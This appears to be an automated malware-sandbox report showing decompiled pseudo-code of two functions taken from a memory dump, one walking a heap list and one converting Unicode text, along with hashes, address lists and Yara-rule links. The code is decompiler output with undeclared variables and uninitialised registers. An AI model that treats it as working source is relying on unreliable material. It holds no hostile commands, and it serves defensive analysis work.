                                                • Instruction Fuzzy Hash: F681FF71A052499FDB25CF29C894FBEB7B9FF80704F148468E816CB2A2D334DA51CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00930D3B, Relevance: .2, Instructions: 229COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 65%
                                                			E00930D3B(signed int _a4) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t95;
				signed int _t97;
				signed short* _t98;
				signed int* _t106;
				signed short _t109;
				signed short _t110;
				signed int* _t118;
				signed int _t120;
				signed short _t122;
				signed short _t123;
				void* _t124;
				signed int _t125;
				intOrPtr* _t130;
				signed short* _t136;
				signed int _t138;
				signed int _t140;
				signed short _t146;
				signed short _t147;
				signed short _t151;
				signed short _t154;
				signed short _t155;
				intOrPtr _t156;
				signed short _t161;
				signed short* _t162;
				signed int* _t171;
				signed int _t172;
				signed short* _t175;

				_v8 = _v8 & 0x00000000;
				_t120 = _a4;
				_t95 = _t120 + 0xc4;
				_t171 =  *(_t95 + 4);
				if(_t95 == _t171) {
					L15:
					return _v8;
				} else {
					do {
						_t175 = _t171 - 8;
						if( *(_t120 + 0x4c) != 0) {
							 *_t175 =  *_t175 ^  *(_t120 + 0x50);
							if(_t175[1] != (_t175[1] ^ _t175[0] ^  *_t175)) {
								_push(0);
								_push(_t175);
								_push(_t120);
								E0099F8EE(_t120, _t171, _t175, __eflags);
							}
						}
						_t97 =  *_t175 & 0x0000ffff;
						_t172 =  *_t171;
						_v20 = _t97;
						_v32 = _t97;
						if((_t175[1] & 0x00000008) != 0) {
							_t123 = _t175[6];
							_t37 =  &(_t175[4]); // 0x8
							_t98 = _t37;
							_t155 =  *_t98;
							_v28 = _t155;
							_t156 =  *((intOrPtr*)(_t155 + 4));
							_v32 = _t123;
							_t124 =  *_t123;
							__eflags = _t124 - _t156;
							if(__eflags != 0) {
								L56:
								_push(0);
								_push(_t124);
								_push(_t156);
								_push(_t98);
								_push(_t120);
								_push(0xc);
								E0099F840(_t120, _t124, _t156, _t172, _t175, __eflags);
								goto L35;
							}
							__eflags = _t124 - _t98;
							if(__eflags != 0) {
								goto L56;
							}
							 *((intOrPtr*)(_t120 + 0x78)) =  *((intOrPtr*)(_t120 + 0x78)) - ( *_t175 & 0x0000ffff);
							_t109 =  *(_t120 + 0xb8);
							__eflags = _t109;
							if(_t109 == 0) {
								L31:
								_t110 = _v28;
								_t136 = _v32;
								 *_t136 = _t110;
								 *(_t110 + 4) = _t136;
								__eflags = _t175[1] & 0x00000008;
								if(__eflags != 0) {
									E009261FE(_t175, __eflags);
								}
								_push(1);
								_push( *_t175 & 0x0000ffff);
								_push(_t175);
								goto L34;
							}
							_t138 =  *_t175 & 0x0000ffff;
							while(1) {
								__eflags = _t138 -  *(_t109 + 4);
								if(_t138 <  *(_t109 + 4)) {
									break;
								}
								_t161 =  *_t109;
								__eflags = _t161;
								if(_t161 == 0) {
									_t122 =  *(_t109 + 4) - 1;
									__eflags = _t122;
									_v12 = _t122;
									L25:
									_t140 = _t122 -  *((intOrPtr*)(_t109 + 0x14));
									__eflags =  *(_t109 + 8);
									_v16 = _t140;
									if( *(_t109 + 8) != 0) {
										_t140 = _t140 + _t140;
										__eflags = _t140;
									}
									_t172 = _t140 << 2;
									_t162 = _t172 +  *((intOrPtr*)(_t109 + 0x20));
									 *((intOrPtr*)(_t109 + 0xc)) =  *((intOrPtr*)(_t109 + 0xc)) - 1;
									_v24 =  *_t162;
									__eflags = _t122 -  *(_t109 + 4) - 1;
									if(_t122 ==  *(_t109 + 4) - 1) {
										_t56 = _t109 + 0x10;
										 *_t56 =  *(_t109 + 0x10) - 1;
										__eflags =  *_t56;
									}
									_t58 =  &(_t175[4]); // 0x8
									__eflags = _v24 - _t58;
									if(_v24 == _t58) {
										__eflags =  *_t109;
										_t146 =  *(_t109 + 4);
										if( *_t109 == 0) {
											_t146 = _t146 - 1;
											__eflags = _t146;
										}
										__eflags = _v12 - _t146;
										_t147 = _t175[4];
										_t120 = _a4;
										if(_v12 < _t146) {
											_v24 = _t147;
											__eflags = _t147 -  *((intOrPtr*)(_t109 + 0x18));
											if(_t147 ==  *((intOrPtr*)(_t109 + 0x18))) {
												L54:
												 *(_t172 +  *((intOrPtr*)(_t109 + 0x20))) =  *(_t172 +  *((intOrPtr*)(_t109 + 0x20))) & 0x00000000;
												goto L41;
											}
											__eflags =  *(_t120 + 0x4c);
											if( *(_t120 + 0x4c) == 0) {
												_t151 =  *(_t147 - 8) & 0x0000ffff;
											} else {
												_t154 =  *(_t147 - 8);
												__eflags =  *(_t120 + 0x4c) & _t154;
												if(( *(_t120 + 0x4c) & _t154) != 0) {
													_t154 = _t154 ^  *(_t120 + 0x50);
													__eflags = _t154;
												}
												_t151 = _t154 & 0x0000ffff;
											}
											__eflags = ( *_t175 & 0x0000ffff) != (_t151 & 0x0000ffff);
											if(( *_t175 & 0x0000ffff) != (_t151 & 0x0000ffff)) {
												goto L54;
											} else {
												 *(_t172 +  *((intOrPtr*)(_t109 + 0x20))) = _v24;
												goto L31;
											}
										} else {
											__eflags = _t147 -  *((intOrPtr*)(_t109 + 0x18));
											if(_t147 !=  *((intOrPtr*)(_t109 + 0x18))) {
												 *_t162 = _t147;
												goto L31;
											}
											 *_t162 =  *_t162 & 0x00000000;
											__eflags =  *_t162;
											L41:
											 *( *((intOrPtr*)(_t109 + 0x1c)) + (_v16 >> 5) * 4) =  *( *((intOrPtr*)(_t109 + 0x1c)) + (_v16 >> 5) * 4) &  !(1 << (_v16 & 0x0000001f));
											goto L31;
										}
									} else {
										_t120 = _a4;
										goto L31;
									}
								}
								_t109 = _t161;
							}
							_t122 = _t138;
							_v12 = _t138;
							goto L25;
						} else {
							_t118 = E009029B2(_t120, _t175,  &_v20, 1);
							_t125 = _v20;
							if(_t125 != _v32) {
								__eflags = _t118 - _t175;
								if(_t118 == _t175) {
									L61:
									_push(1);
									_push(_t125);
									_push(_t118);
									L34:
									_push(_t120);
									E0091EE4C(_t120, _t172);
									L35:
									_t171 =  *(_t120 + 0xc8);
									goto L10;
								}
								__eflags =  *_t118 - 0x200;
								if( *_t118 < 0x200) {
									L60:
									E00907353(_t120, _t118, _t125);
									goto L35;
								}
								__eflags =  *(_t120 + 0x54) ^ _t118[1];
								if(( *(_t120 + 0x54) ^ _t118[1]) == 0) {
									goto L61;
								}
								goto L60;
							}
							_t130 = _v8;
							if(_t130 != 0) {
								__eflags =  *_t130 -  *_t118;
								if(__eflags < 0) {
									goto L7;
								}
								L8:
								if( *(_t120 + 0x4c) != 0) {
									_t118[0] = _t118[0] ^ _t118[0] ^  *_t118;
									 *_t118 =  *_t118 ^  *(_t120 + 0x50);
								}
								goto L10;
							}
							L7:
							_v8 = _t118;
							goto L8;
						}
						L10:
					} while (_t120 + 0xc4 != _t171);
					if(_v8 != 0 &&  *(_t120 + 0x4c) != 0) {
						_t106 = _v8;
						 *_t106 =  *_t106 ^  *(_t120 + 0x50);
						if(_t106[0] != (_t106[0] ^ _t106[0] ^  *_t106)) {
							_push(0);
							_push(_t106);
							_push(_t120);
							E0099F8EE(_t120, _t171, 0, __eflags);
						}
					}
					goto L15;
				}
			}









































                                                0x00930d43
                                                0x00930d48
                                                0x00930d4b
                                                0x00930d52
                                                0x00930d57
                                                0x00930dff
                                                0x00930e05
                                                0x00930d5d
                                                0x00930d5e
                                                0x00930d62
                                                0x00930d65
                                                0x00930d6a
                                                0x00930d77
                                                0x0094d733
                                                0x0094d735
                                                0x0094d736
                                                0x0094d737
                                                0x0094d737
                                                0x00930d77
                                                0x00930d7d
                                                0x00930d80
                                                0x00930d82
                                                0x00930d89
                                                0x00930d8c
                                                0x00944707
                                                0x0094470a
                                                0x0094470a
                                                0x0094470d
                                                0x0094470f
                                                0x00944712
                                                0x00944715
                                                0x00944718
                                                0x0094471a
                                                0x0094471c
                                                0x0094d798
                                                0x0094d798
                                                0x0094d79a
                                                0x0094d79b
                                                0x0094d79c
                                                0x0094d79d
                                                0x0094d79e
                                                0x0094d7a0
                                                0x00000000
                                                0x0094d7a0
                                                0x00944722
                                                0x00944724
                                                0x00000000
                                                0x00000000
                                                0x0094472d
                                                0x00944730
                                                0x00944736
                                                0x00944738
                                                0x00944791
                                                0x00944791
                                                0x00944794
                                                0x00944797
                                                0x00944799
                                                0x0094479c
                                                0x009447a0
                                                0x009447a6
                                                0x009447a6
                                                0x009447ae
                                                0x009447b0
                                                0x009447b1
                                                0x00000000
                                                0x009447b1
                                                0x0094473a
                                                0x00944747
                                                0x00944747
                                                0x0094474a
                                                0x00000000
                                                0x00000000
                                                0x0094473f
                                                0x00944741
                                                0x00944743
                                                0x00944754
                                                0x00944754
                                                0x00944755
                                                0x00944758
                                                0x0094475a
                                                0x0094475d
                                                0x00944761
                                                0x00944764
                                                0x00944766
                                                0x00944766
                                                0x00944766
                                                0x0094476d
                                                0x00944770
                                                0x00944775
                                                0x00944778
                                                0x0094477f
                                                0x00944781
                                                0x00944783
                                                0x00944783
                                                0x00944783
                                                0x00944783
                                                0x00944786
                                                0x00944789
                                                0x0094478c
                                                0x009447c3
                                                0x009447c6
                                                0x009447c9
                                                0x009447cb
                                                0x009447cb
                                                0x009447cb
                                                0x009447cc
                                                0x009447cf
                                                0x009447d2
                                                0x009447d5
                                                0x0094d74b
                                                0x0094d74e
                                                0x0094d751
                                                0x0094d785
                                                0x0094d788
                                                0x00000000
                                                0x0094d788
                                                0x0094d753
                                                0x0094d757
                                                0x0094d769
                                                0x0094d759
                                                0x0094d759
                                                0x0094d75c
                                                0x0094d75f
                                                0x0094d761
                                                0x0094d761
                                                0x0094d761
                                                0x0094d764
                                                0x0094d764
                                                0x0094d773
                                                0x0094d775
                                                0x00000000
                                                0x0094d777
                                                0x0094d77d
                                                0x00000000
                                                0x0094d77d
                                                0x009447db
                                                0x009447db
                                                0x009447de
                                                0x0094d791
                                                0x00000000
                                                0x0094d791
                                                0x009447e4
                                                0x009447e4
                                                0x009447e7
                                                0x009447ff
                                                0x00000000
                                                0x009447ff
                                                0x0094478e
                                                0x0094478e
                                                0x00000000
                                                0x0094478e
                                                0x0094478c
                                                0x00944745
                                                0x00944745
                                                0x0094d741
                                                0x0094d743
                                                0x00000000
                                                0x00930d92
                                                0x00930d9a
                                                0x00930d9f
                                                0x00930da5
                                                0x0094d7aa
                                                0x0094d7ac
                                                0x0094d7cf
                                                0x0094d7cf
                                                0x0094d7d1
                                                0x0094d7d2
                                                0x009447b2
                                                0x009447b2
                                                0x009447b3
                                                0x009447b8
                                                0x009447b8
                                                0x00000000
                                                0x009447b8
                                                0x0094d7b3
                                                0x0094d7b6
                                                0x0094d7c2
                                                0x0094d7c5
                                                0x00000000
                                                0x0094d7c5
                                                0x0094d7bc
                                                0x0094d7c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094d7c0
                                                0x00930dab
                                                0x00930db0
                                                0x00944806
                                                0x00944809
                                                0x00000000
                                                0x00000000
                                                0x00930db9
                                                0x00930dbd
                                                0x00930dc7
                                                0x00930dcd
                                                0x00930dcd
                                                0x00000000
                                                0x00930dbd
                                                0x00930db6
                                                0x00930db6
                                                0x00000000
                                                0x00930db6
                                                0x00930dcf
                                                0x00930dd5
                                                0x00930dde
                                                0x00930de5
                                                0x00930deb
                                                0x00930df8
                                                0x0094d7d8
                                                0x0094d7d9
                                                0x0094d7da
                                                0x0094d7db
                                                0x0094d7db
                                                0x00930df8
                                                0x00000000
                                                0x00930dfe

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                • Instruction ID: c8d3ca13f7dbd99a92db8b628f7ca659695619244c3237e28c13a360a1cce1ed
                                                • Opcode Fuzzy Hash: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                • Instruction Fuzzy Hash: 92918D74601201DFDB29CF54C4A4F7ABBF9FF89700F258499E8868B296D734AC41CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0092D005, Relevance: .2, Instructions: 221COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 99%
                                                			E0092D005(signed short __ecx, unsigned short* _a4, signed int _a8, signed int _a12, signed short* _a16, signed int _a20) {
				unsigned int _v8;
				unsigned short* _v12;
				signed int __ebx;
				void* _t378;
				intOrPtr* _t379;
				signed char _t383;
				signed int _t384;
				signed short _t385;
				intOrPtr _t386;
				unsigned short _t388;
				intOrPtr _t390;
				unsigned int _t393;
				intOrPtr _t447;
				unsigned short _t449;
				intOrPtr _t450;
				signed short _t456;
				signed short _t462;
				signed short _t468;
				signed short _t474;
				signed short _t480;
				signed short _t486;
				signed short _t492;
				signed short _t498;
				signed short _t504;
				signed short _t510;
				signed short _t516;
				signed short _t523;
				signed short _t529;
				signed short _t535;
				signed short _t541;
				intOrPtr _t542;
				signed int _t546;
				signed int _t547;
				intOrPtr _t577;
				signed short* _t579;
				signed short _t583;
				intOrPtr _t584;
				unsigned short* _t591;
				signed short _t698;
				signed short _t699;
				intOrPtr _t703;
				intOrPtr _t733;
				intOrPtr _t737;

				_t446 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t393 = _a20 >> 1;
				_v8 = _t393;
				if( *0x9d0003 != 0) {
					_t591 = _a4;
					_v12 = _t591;
					if(_t393 == 0) {
						L35:
						_t379 = _a12;
						if(_t379 != 0) {
							 *_t379 = _t591 - _v12;
						}
						goto L48;
					}
					while(_a8 != 0) {
						_t447 =  *0x9d0074; // 0x7efb0222
						_t383 =  *(_t447 + ( *_a16 & 0x0000ffff) * 2) & 0x0000ffff;
						_a16 =  &(_a16[1]);
						_t583 =  *(0x9d4b20 + (_t383 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff;
						_t384 = _t383 & 0x000000ff;
						if(_t583 == 0) {
							_t584 =  *0x9d006c; // 0x7efb001c
							_t385 =  *(_t584 + _t384 * 2) & 0x0000ffff;
						} else {
							_t390 =  *0x9d0068; // 0x0
							_t385 =  *(_t390 + ((_t583 & 0x0000ffff) + _t384) * 2) & 0x0000ffff;
						}
						_t698 = _t385;
						_a20 = _t385;
						if(_t698 >= 0x61) {
							if(_t698 > 0x7a) {
								_t386 =  *0x9d005c; // 0x7efd0654
								_t585 = _t698 & 0x0000ffff;
								_t393 = _v8;
								_t699 = _t698 +  *((intOrPtr*)(_t386 + (( *(_t386 + (( *(_t386 + ((_t698 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t585 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t585 & 0x0000000f)) * 2));
								_t591 = _a4;
								goto L31;
							}
							_a20 = _a20 + 0xffe0;
							goto L29;
						} else {
							_a20 = _t698 & 0x0000ffff;
							L29:
							_t699 = _a20;
							L31:
							_t388 =  *(_t447 + (_t699 & 0x0000ffff) * 2) & 0x0000ffff;
							_t449 = _t388 >> 8;
							if(_t449 == 0) {
								L34:
								 *_t591 = _t388;
								_t591 =  &(_t591[0]);
								_a8 = _a8 - 1;
								_t393 = _t393 - 1;
								_a4 = _t591;
								_v8 = _t393;
								if(_t393 != 0) {
									continue;
								}
								goto L35;
							}
							_a8 = _a8 - 1;
							if(_a8 < 2) {
								goto L35;
							}
							 *_t591 = _t449;
							_t591 =  &(_t591[0]);
							goto L34;
						}
					}
					goto L35;
				} else {
					__ecx = _a8;
					if(__ebx >= __ecx) {
						_a8 = __ecx;
					} else {
						__ecx = __ebx;
						_a8 = __ebx;
					}
					__eax = _a12;
					if(__eax != 0) {
						 *__eax = __ecx;
					}
					__eax =  *0x9d0070; // 0x7efb0222
					__ecx = __ecx & 0x0000000f;
					_a4 = _a4 + __ecx;
					_a12 = __ecx;
					do {
						if(_t547 > 0xf) {
							_t737 =  *0x9d006c; // 0x7efb001c
							_t446 =  *(_t737 + ( *(( *_t579 & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
							_a4 =  &(_a4[8]);
							_t579 =  &(_t579[0x10]);
							_a20 = _t446;
							if(_t446 < 0x61) {
								_a20 = _t446 & 0x0000ffff;
								L110:
								 *((char*)(_a4 - 0x10)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
								L111:
								_t703 =  *0x9d006c; // 0x7efb001c
								_t456 =  *(_t703 + ( *(( *(_t579 - 0x1e) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
								_a20 = _t456;
								if(_t456 < 0x61) {
									_a20 = _t456 & 0x0000ffff;
								} else {
									if(_t456 > 0x7a) {
										_t762 = _t456 & 0x0000ffff;
										_t577 =  *0x9d005c; // 0x7efd0654
										_a20 = _a20 +  *((intOrPtr*)(_t577 + (( *(_t577 + (( *(_t577 + ((_t456 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t762 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t762 & 0x0000000f)) * 2));
									} else {
										_a20 = _a20 + 0xffe0;
									}
								}
								 *((char*)(_a4 - 0xf)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
								L98:
								_t462 =  *( *0x9d006c + ( *(( *(_t579 - 0x1c) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
								_a20 = _t462;
								if(_t462 < 0x61) {
									_a20 = _t462 & 0x0000ffff;
									L101:
									 *((char*)(_a4 - 0xe)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
									L94:
									_t468 =  *( *0x9d006c + ( *(( *(_t579 - 0x1a) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
									_a20 = _t468;
									if(_t468 < 0x61) {
										_a20 = _t468 & 0x0000ffff;
									} else {
										if(_t468 > 0x7a) {
											_t758 = _t468 & 0x0000ffff;
											_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t573 + ((_t468 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t758 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t758 & 0x0000000f)) * 2));
										} else {
											_a20 = _a20 + 0xffe0;
										}
									}
									 *((char*)(_a4 - 0xd)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
									L85:
									_t474 =  *( *0x9d006c + ( *(( *(_t579 - 0x18) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
									_a20 = _t474;
									if(_t474 < 0x61) {
										_a20 = _t474 & 0x0000ffff;
										L88:
										 *((char*)(_a4 - 0xc)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
										L89:
										_t480 =  *( *0x9d006c + ( *(( *(_t579 - 0x16) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
										_a20 = _t480;
										if(_t480 < 0x61) {
											_a20 = _t480 & 0x0000ffff;
										} else {
											if(_t480 > 0x7a) {
												_t754 = _t480 & 0x0000ffff;
												_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t569 + ((_t480 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t754 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t754 & 0x0000000f)) * 2));
											} else {
												_a20 = _a20 + 0xffe0;
											}
										}
										 *((char*)(_a4 - 0xb)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
										L81:
										_t486 =  *( *0x9d006c + ( *(( *(_t579 - 0x14) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
										_a20 = _t486;
										if(_t486 < 0x61) {
											_a20 = _t486 & 0x0000ffff;
											L84:
											 *((char*)(_a4 - 0xa)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
											L76:
											_t492 =  *( *0x9d006c + ( *(( *(_t579 - 0x12) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
											_a20 = _t492;
											if(_t492 < 0x61) {
												_a20 = _t492 & 0x0000ffff;
											} else {
												if(_t492 > 0x7a) {
													_t750 = _t492 & 0x0000ffff;
													_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t565 + ((_t492 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t750 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t750 & 0x0000000f)) * 2));
												} else {
													_a20 = _a20 + 0xffe0;
												}
											}
											 *((char*)(_a4 - 9)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
											L72:
											_t498 =  *( *0x9d006c + ( *(( *(_t579 - 0x10) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
											_a20 = _t498;
											if(_t498 < 0x61) {
												_a20 = _t498 & 0x0000ffff;
												L75:
												 *((char*)(_a4 - 8)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
												L49:
												_t504 =  *( *0x9d006c + ( *(( *(_t579 - 0xe) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
												_a20 = _t504;
												if(_t504 < 0x61) {
													_a20 = _t504 & 0x0000ffff;
													L52:
													 *((char*)(_a4 - 7)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
													L53:
													_t510 =  *( *0x9d006c + ( *(( *(_t579 - 0xc) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
													_a20 = _t510;
													if(_t510 < 0x61) {
														_a20 = _t510 & 0x0000ffff;
														L56:
														 *((char*)(_a4 - 6)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
														L57:
														_t516 =  *( *0x9d006c + ( *(( *(_t579 - 0xa) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
														_a20 = _t516;
														if(_t516 < 0x61) {
															_a20 = _t516 & 0x0000ffff;
														} else {
															if(_t516 > 0x7a) {
																_t724 = _t516 & 0x0000ffff;
																_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t517 + ((_t516 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t724 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t724 & 0x0000000f)) * 2));
															} else {
																_a20 = _a20 + 0xffe0;
															}
														}
														 *((char*)(_a4 - 5)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
														L60:
														_t523 =  *( *0x9d006c + ( *(( *(_t579 - 8) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
														_a20 = _t523;
														if(_t523 < 0x61) {
															_a20 = _t523 & 0x0000ffff;
														} else {
															if(_t523 > 0x7a) {
																_t742 = _t523 & 0x0000ffff;
																_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t556 + ((_t523 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t742 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t742 & 0x0000000f)) * 2));
															} else {
																_a20 = _a20 + 0xffe0;
															}
														}
														 *((char*)(_a4 - 4)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
														L64:
														_t529 =  *( *0x9d006c + ( *(( *(_t579 - 6) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
														_a20 = _t529;
														if(_t529 < 0x61) {
															_a20 = _t529 & 0x0000ffff;
														} else {
															if(_t529 > 0x7a) {
																_t740 = _t529 & 0x0000ffff;
																_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t554 + ((_t529 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t740 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t740 & 0x0000000f)) * 2));
															} else {
																_a20 = _a20 + 0xffe0;
															}
														}
														 *((char*)(_a4 - 3)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
														L68:
														_t535 =  *( *0x9d006c + ( *(( *(_t579 - 4) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
														_a20 = _t535;
														if(_t535 < 0x61) {
															_a20 = _t535 & 0x0000ffff;
														} else {
															if(_t535 > 0x7a) {
																_t738 = _t535 & 0x0000ffff;
																_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t552 + ((_t535 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t738 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t738 & 0x0000000f)) * 2));
															} else {
																_a20 = _a20 + 0xffe0;
															}
														}
														 *((char*)(_a4 - 2)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
														L44:
														_t733 =  *0x9d006c; // 0x7efb001c
														_t541 =  *(_t733 + ( *(( *(_t579 - 2) & 0x0000ffff) + _t378) & 0x000000ff) * 2) & 0x0000ffff;
														_a20 = _t541;
														if(_t541 >= 0x61) {
															if(_t541 > 0x7a) {
																_t734 = _t541 & 0x0000ffff;
																_t542 =  *0x9d005c; // 0x7efd0654
																_a20 = _a20 +  *((intOrPtr*)(_t542 + (( *(_t542 + (( *(_t542 + ((_t541 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t734 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t734 & 0x0000000f)) * 2));
															} else {
																_a20 = _a20 + 0xffe0;
															}
														} else {
															_a20 = _t541 & 0x0000ffff;
														}
														 *((char*)(_a4 - 1)) =  *((intOrPtr*)((_a20 & 0x0000ffff) + _t378));
														_t546 = _a12;
														goto L47;
													}
													if(_t510 <= 0x7a) {
														_a20 = _a20 + 0xffe0;
													} else {
														_t744 = _t510 & 0x0000ffff;
														_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t559 + ((_t510 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t744 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t744 & 0x0000000f)) * 2));
													}
													goto L56;
												}
												if(_t504 <= 0x7a) {
													_a20 = _a20 + 0xffe0;
												} else {
													_t746 = _t504 & 0x0000ffff;
													_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t561 + ((_t504 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t746 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t746 & 0x0000000f)) * 2));
												}
												goto L52;
											}
											if(_t498 <= 0x7a) {
												_a20 = _a20 + 0xffe0;
											} else {
												_t748 = _t498 & 0x0000ffff;
												_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t563 + ((_t498 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t748 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t748 & 0x0000000f)) * 2));
											}
											goto L75;
										}
										if(_t486 <= 0x7a) {
											_a20 = _a20 + 0xffe0;
										} else {
											_t752 = _t486 & 0x0000ffff;
											_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t567 + ((_t486 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t752 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t752 & 0x0000000f)) * 2));
										}
										goto L84;
									}
									if(_t474 <= 0x7a) {
										_a20 = _a20 + 0xffe0;
									} else {
										_t756 = _t474 & 0x0000ffff;
										_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t571 + ((_t474 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t756 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t756 & 0x0000000f)) * 2));
									}
									goto L88;
								}
								if(_t462 <= 0x7a) {
									_a20 = _a20 + 0xffe0;
								} else {
									_t760 = _t462 & 0x0000ffff;
									_a20 = _a20 +  *((intOrPtr*)( *0x9d005c + (( *( *0x9d005c + (( *(_t575 + ((_t462 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t760 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t760 & 0x0000000f)) * 2));
								}
								goto L101;
							}
							if(_t446 <= 0x7a) {
								_a20 = _a20 + 0xffe0;
							} else {
								_t700 = _t446 & 0x0000ffff;
								_t450 =  *0x9d005c; // 0x7efd0654
								_a20 = _a20 +  *((intOrPtr*)(_t450 + (( *(_t450 + (( *(_t450 + ((_t446 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t700 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t700 & 0x0000000f)) * 2));
							}
							goto L110;
						}
